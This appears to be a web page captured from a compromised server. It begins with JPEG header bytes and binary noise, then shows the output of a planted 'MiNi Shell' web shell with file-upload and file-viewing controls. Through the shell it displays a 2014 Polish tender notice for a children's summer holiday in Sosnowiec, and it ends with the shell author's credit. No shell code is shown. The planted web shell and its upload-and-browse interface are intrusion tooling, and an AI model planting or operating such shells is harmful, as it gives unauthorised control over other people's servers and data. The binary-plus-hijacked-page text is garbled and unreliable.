JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140424/138316-N-2014.html

<p class="kh_header"><b>Sosnowiec: COW-ZAF 27.WL.7.2014</b><br>
<b>Numer ogłoszenia: 138316 - 2014; data zamieszczenia: 24.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Opiekuńczo-Wychowawcze Pomocy Dziecku i Rodzinie , ul. Sucha 21, 41-200 Sosnowiec, woj. śląskie, tel. 032 7854600, faks 032 7854600.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> COW-ZAF 27.WL.7.2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa obejmująca zorganizowanie i przeprowadzenie
wypoczynku letniego dla dzieci i młodzieży w wieku 5-18 lat podopiecznych Centrum Opiekuńczo Wychowawcze Pomocy Dziecku i Rodzinie Zespołów Opiekuńczo Wychowawczych Nr 4 w Sosnowcu  
 Wypoczynek letni należy zorganizować: 
Zadanie Nr 1
Wyjazd wakacyjny dla grupy 24 dzieci w wieku od 7 do 18 lat uczęszczających do przedszkola i szkoły z Zespołu Opiekuńczo Wychowawczego Nr 4 ul. Koszalińska 51-53.
Czas trwania turnusu:  (14 noclegów ); 
Rozpoczęcie turnusu pomiędzy:28.07.2014 a 30.07.2014 
Miejsce wypoczynku: miejscowość położona w górach.
Zakwaterowanie: ogrodzony pensjonat lub ośrodek wypoczynkowy z placem zabaw, piaskownicą, 
położony z dala od głównej, ruchliwej drogi. 
Oferent jest zobowiązany zapewnić opiekę 1 wychowawcy dla grupy 10 dzieci oraz kierownika . 
Oferent zobowiązany jest do zagwarantowania dojazdu dzieci z Zespołu Opiekuńczo -Wychowawczego Nr 4 ul. Koszalińska 51-53 w Sosnowcu   do miejsca pobytu wraz z powrotem.
Oferent jest zobowiązany do zapewnienia opieki medycznej 
Oferent zobowiązany jest do przedstawienia opisu oferowanej bazy noclegowej jak również programu zaplanowanych zajęć integracyjnych, ruchowych i wycieczek, zarówno autokarowych jak i pieszych.
Zamawiający zastrzega sobie możliwość zmniejszenia liczby uczestników wypoczynku
letniego z powodu zdarzeń losowych, których nie można było wcześniej przewidzieć lub
w przypadku uzasadnionej rezygnacji uczestnika i braku możliwości zastąpienia innym
uczestnikiem. W takim wypadku, wykonawcy będzie przysługiwać tylko wynagrodzenie za
faktycznie liczbę osób uczestniczących w turnusie i nie będzie on zgłaszać z tego tytułu
żadnych roszczeń.
Wykonawca zobowiązany jest do zapewnienia bezpiecznych i higienicznych warunków
wypoczynku i właściwej opieki wychowawczej uczestnikom wypoczynku letniego oraz
zatrudnienia odpowiednio przygotowanej kadry pedagogicznej.
Wykonawca zobowiązuje się do:
zorganizowania i przeprowadzenia wypoczynku letniego z zachowaniem wszystkich przepisów rozporządzenia Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania ( Dz. U. Nr 12 poz. 67 z późn.zm.),
2.	Transport: 
zapewnienia transportu uczestników wypoczynku letniego w obie strony autokarem sprawnym  technicznie, posiadającym ważne badania techniczne, ważne ubezpieczenie OC,AC,NW oraz  sprawną klimatyzację i toaletę,
przewozy powinny być zorganizowane zgodnie z ustawą z dnia 6 września 2001r o transporcie  drogowym (tj. Dz.U. z 2012 r. poz.1265 z późn.zm.),
zapewnienia wymaganej przepisami prawa ilości kierowców, kierowcy muszą posiadać stosowne uprawnienia do kierowania autokarami i przewozu osób,
przejazd powinien być zorganizowany i przeprowadzony w ciągu dnia,
zapewnienia w przypadku awarii autokaru, autokaru zastępczego na własny koszt, spełniającego wymagania określone w SIWZ,
podstawienia autokaru co najmniej 30 min przed planowanym wyjazdem,
zorganizowania i zrealizowania przewozu dzieci i młodzieży uczestników wypoczynku
letniego w dniu rozpoczęcia wypoczynku z przed siedziby  Zamawiającego w Sosnowcu na  miejsce pobytu oraz w dniu zakończenia wypoczynku letniego z miejsca pobytu przed   siedzibę Zamawiającego w Sosnowcu 
zapewnienia podróży autokarem tylko uczestników wypoczynku letniego skierowanych przez Zamawiającego,
zapewnienia uczestnikom wypoczynku letniego opieki kadry pedagogicznej od momentu przejęcia  uczestnika wypoczynku letniego od rodzica lub opiekuna do czasu oddania go w ręce rodzica lub  opiekuna w szczególności z zachowaniem warunków organizacji wypoczynku oraz wymogów  wobec kwalifikacji i liczby kadry pedagogicznej, określonych w obowiązujących przepisach,
3.	Zakwaterowanie:
zakwaterowania uczestników kolonii w ośrodku wypoczynkowym, spełniającym warunki określone w SIWZ,
zakwaterowania uczestników wypoczynku letniego w budynku/ach murowanych w rozumieniu przepisów Prawo budowlane,
Zamawiający wymaga, aby uczestnicy zostali zakwaterowani w budynku/ach razem z wychowawcami,
pokoje max. 6 osobowe wyposażonych w niezbędny sprzęt z możliwością swobodnego
  rozpakowania bagażu. Pokoje bez łóżek piętrowych i dostawek. Łóżka jednoosobowe  (tapczany) z  czystą pościelą (kołdra, poduszka i prześcieradło). Do każdego łóżka powinna   być przynależna  szafka nocna, minimum jedna półka w szafie na dziecko. W pokoju szafa   ubraniowa, stół oraz  krzesła,
Wykonawca zapewni pobyt w ośrodku wypoczynkowym spełniającym wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno - sanitarnych oraz ochrony środowiska określonych przepisami o ochronie przeciwpożarowej, Państwowej
  Inspekcji Sanitarnej i ochronie środowiska,
teren ośrodka winien być ogrodzony, oświetlony,
w przypadku wspólnej łazienki zapewnienia uczestnikom jednego WC maksymalnie na 10 uczestników, jednej umywalki z ciepłą i zimną wodą maksymalnie na 10 uczestników oraz jednego stanowiska prysznicowego z ciepłą i zimną wodą maksymalnie na 15 uczestników.
 Łazienki muszą być czyste i estetyczne. Ciepła i zimna woda winna być dostępna 24 h / dobę,
udostępnienia uczestnikom wypoczynku letniego na terenie ośrodka wypoczynkowego, w którym zakwaterowana będzie grupa bezpłatnie sprawnych urządzeń rekreacyjnosportowych m.in. placu zabaw, boiska do piłki nożnej, siatkówki, stołu do tenisa stołowego, sali   świetlicowej wyposażonej m.in. w sprawny sprzęt RTV i dyskotekowy, miejsca na ognisko   oraz innych obiektów i urządzeń zgodnie ze złożoną ofertą,
4. Wyżywienie:
zapewnienia uczestnikom wypoczynku letniego stołówki na terenie ośrodka wypoczynkowego w którym zakwaterowani będą uczestnicy,
zapewnienia min. 4 posiłków dziennie (śniadanie, obiad, podwieczorek, kolacja) - zgodnie z normami żywieniowymi zalecanymi przez Instytut Żywności i Żywienia, zasadami higieny oraz racjonalnego żywienia,
zapewnienia podczas wypoczynku letniego nieograniczonego dostępu do napojów, pieczywa, masła i dżemu,
zapewnienia jednego ciepłego posiłku w trakcie całodniowych wycieczek autokarowych w zwiedzanej miejscowości,
zapewnienia suchego prowiantu i napojów na czas wycieczek oraz podróży powrotnej do Sosnowca 
zapewnienia obiadu po przyjeździe na miejsce wypoczynku oraz śniadania przed wyjazdem do Sosnowca,
Wykonawca zapewni wysoką jakość wyżywienia, które musi być zdrowe, świeże, sycące i smaczne,
zapewnienia kierownika turnusu z zachowaniem warunków organizacji wypoczynku oraz wymogów wobec kwalifikacji określonych w obowiązujących przepisach,
zapewnienia całodobowej opieki doświadczonej kadry pedagogicznej, posiadających kwalifikacje określone w obowiązujących przepisach prawa (Zamawiający wymaga zapewnienia co najmniej 1 wychowawcy na 10 -cioro dzieci),
zapewnienia całodobowej opieki medycznej dla uczestników wypoczynku letniego, zgodnie  z obowiązującymi przepisami (lekarz na każde wezwanie, pielęgniarka z całodobowym     pobytem w ośrodku wypoczynkowym, w którym zakwaterowana będzie grupa),
zapewnienia możliwości korzystania z kąpielisk spełniających wymogi bezpieczeństwa i czystości wody zorganizowanych zgodnie z obowiązującymi w tym zakresie przepisami prawa,
zapewnienia opieki ratownika(ów) z odpowiednimi kwalifikacjami dla uczestników wypoczynku  letniego w trakcie korzystania z kąpieli oraz kąpielisk (np. morze, basen) na czas trwania wypoczynku, zgodnie z obowiązującymi przepisami prawa,
zapewnienia opieki przewodnika w trakcie wycieczek turystyczno-krajoznawczych dla uczestników wypoczynku zgodnie z obowiązującymi przepisami prawa,
ubezpieczenia uczestników od NNW na czas przejazdu, pobytu, wycieczek - na kwotę
      min. 10.000,00 zł na każdego uczestnika wypoczynku letniego,
organizowania uczestnikom wypoczynku letniego wycieczek, zajęć na wolnym powietrzu,  w   razie wypadków zgodnie z obowiązującymi przepisami,
zapewnienia realizacji programu wypoczynku kulturalno-wychowawczego, turystyczno- krajoznawczego,  sportowo-rekreacyjnego,
realizacji programu wypoczynku letniego, który powinien uwzględniać co najmniej
           następujące elementy:
             - 2 ogniska z pieczeniem kiełbasek,
             - 3 dyskoteki,
             - co najmniej 2 całodniowe autokarowe wycieczki turystyczno-krajoznawczą z nieodpłatnym  
                dla uczestników wypoczynku letniego wstępem do zwiedzanych obiektów,
             -  co najmniej 2 wycieczki piesze turystyczno-krajoznawcze,
             -  organizowanie zajęć i rozgrywek sportowych, gry terenowe, konkursy z dyplomami,    
                nagrodami  rzeczowymi itp.,
             -  codzienne spotkania w grupach w celu omówienia problemów, podsumowania dnia,
                zaplanowania kolejnych dni z uwzględnieniem potrzeb uczestników, inne zaplanowane   
                przez Wykonawcę zajęcia zgodne z potrzebami uczestników i celami wychowawczymi.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga tego warunku.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz ofertowy.       
2.	Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy;           
3.	Oświadczenie Wykonawcy w trybie art. 24 ust. 1 i 2 ustawy;
4.	Zezwolenie na prowadzenie działalności gospodarczej w zakresie organizowania imprez turystycznych, pośredniczenia na zlecenie klientów w zawieraniu umów o świadczeniu usług turystycznych
5.	Wypełniony formularz cenowy.
6.	Opis bazy noclegowej wraz z harmonogramem realizacji zadania - Program zaplanowanych zajęć integracyjnych, ruchowych i wycieczek, zarówno autokarowych jak i pieszych.
7.	Wzór umowy zaparafowany przez upoważnioną do reprezentacji oferenta osobę (osoby),
 8.	Zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwości organu - wystawione nie wcześniej niż 3 miesiące  przed terminem składania ofert;
9.	Oświadczenie, iż zatrudniona kadra pedagogiczna spełnia wymagania przewidziane przepisami prawa dot. wypoczynku dzieci i młodzieży;
10.	Polisa ubezpieczenia na rzecz klientów w związku z działalnością prowadzoną przez organizatorów turystyki i pośredników turystycznych.
11.	Oświadczenie Organizatora   dotyczące  opinii  Państwowej  Straży Pożarnej  art. 23 ust. 2 pkt 5 ustawy z dnia 21 sierpnia 1991 r. o Państwowej Straży Pożarnej (Dz. U. z 2009r. Nr12, poz. 68)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - atrakcyjność programu - 30</li>
<li>3 - standard obiektu - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Administracyjno Finansowy
Centrum Opiekuńczo-Wychowawczym Pomocy Dziecku i Rodzinie
ul. Sucha 21, 41-200 Sosnowiec
 pokój księgowości.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2014 godzina 09:00, miejsce: Zespół Administracyjno Finansowy
Centrum Opiekuńczo-Wychowawczym Pomocy Dziecku i Rodzinie
ul. Sucha 21, 41-200 Sosnowiec
 pokój księgowości.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com